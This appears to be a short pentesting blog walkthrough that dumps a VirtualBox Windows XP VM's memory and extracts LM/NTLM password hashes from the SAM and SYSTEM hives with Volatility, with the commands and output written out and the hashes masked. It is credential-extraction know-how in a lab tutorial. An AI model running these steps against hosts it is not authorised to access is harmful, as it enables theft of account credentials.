For this part I’m using the standalone version of volatility for windows. The goal is dumping LM/NTLM hashes from a windows memory image.
When you have access to a host where virtual machines are running, but you do not have acces to the VMs itself, one possibility is to reboot the VM but starting an ISO and resetting or stealing the password that way. Of course this is very noisy and for a pentester there are better ways. With virtualbox you can dump the memory during runtime.
For this test I am running an old Windows XP SP2 box with virtualbox. The host system is running Windows 8.1.
Dump the memory:
C:\Program Files\Oracle\VirtualBox>vboxmanage debugvm “WinXP_1” dumpvmcore –filename c:\Users\dax\Downloads\volatility_2.4.win.standalone\test.elf
From here it is the usual steps:
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe imageinfo -f test.elf
Volatility Foundation Volatility Framework 2.4
Determining profile based on KDBG search…
Suggested Profile(s) : WinXPSP2x86, WinXPSP3x86 (Instantiated with WinXPSP2x86)
AS Layer1 : IA32PagedMemory (Kernel AS)
AS Layer2 : OSXPmemELF (Unnamed AS)
AS Layer3 : FileAddressSpace (C:\Users\dax\Downloads\volati
lity_2.4.win.standalone\volatility_2.4.win.standalone\test.elf)
PAE type : No PAE
DTB : 0x39000L
KDBG : 0x8054cde0L
Number of Processors : 1
Image Type (Service Pack) : 3
KPCR for CPU 0 : 0xffdff000L
KUSER_SHARED_DATA : 0xffdf0000L
Image date and time : 2016-01-22 10:11:07 UTC+0000
Image local date and time : 2016-01-22 11:11:07 +0100
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hivelist -f test.elf –profile WinXPSP2x86
Volatility Foundation Volatility Framework 2.4
Virtual Physical Name
———- ———- —-
0xe1064380 0x043bf380 \??\C:\Dokumente und Einstellungen\x\Lokale Einstellungen\
Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1078b60 0x04492b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\x\NTUS
ER.DAT
0xe1b4bb60 0x1c5c0b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe1ca9b60 0x1c562b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\LocalS
ervice\NTUSER.DAT
0xe19f9b60 0x1bf35b60 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\Lokale Einstellungen\Anwendungsdaten\Microsoft\Windows\UsrClass.dat
0xe19a77b0 0x1bb727b0 \Device\HarddiskVolume1\Dokumente und Einstellungen\Networ
kService\NTUSER.DAT
0xe186f008 0x1c113008 \Device\HarddiskVolume1\WINDOWS\system32\config\software
0xe1875b60 0x1c11eb60 \Device\HarddiskVolume1\WINDOWS\system32\config\default
0xe187d008 0x1c135008 \Device\HarddiskVolume1\WINDOWS\system32\config\SAM
0xe186fb60 0x1c113b60 \Device\HarddiskVolume1\WINDOWS\system32\config\SECURITY
0xe13cd008 0x02c2c008 [no name]
0xe1035b60 0x028d2b60 \Device\HarddiskVolume1\WINDOWS\system32\config\system
0xe102e008 0x028cc008 [no name]
For retreiving the hashes two values are needed in the next step
y=virtual location of system
s=virtual location of sam
C:\Users\dax\Downloads\volatility_2.4.win.standalone\volatility_2.4.win.standalone>volatility-2.4.standalone.exe hashdump -f test.elf –profile WinXPSP2x86 -y 0xe1035b60 -s 0xe187d008
Volatility Foundation Volatility Framework 2.4
Administrator:500:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Gast:501:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Hilfeassistent:1000:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
SUPPORT_388945a0:1002:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
dax:1003:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
x:1004:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX:::
Links:
danielsauder 
Leave a Reply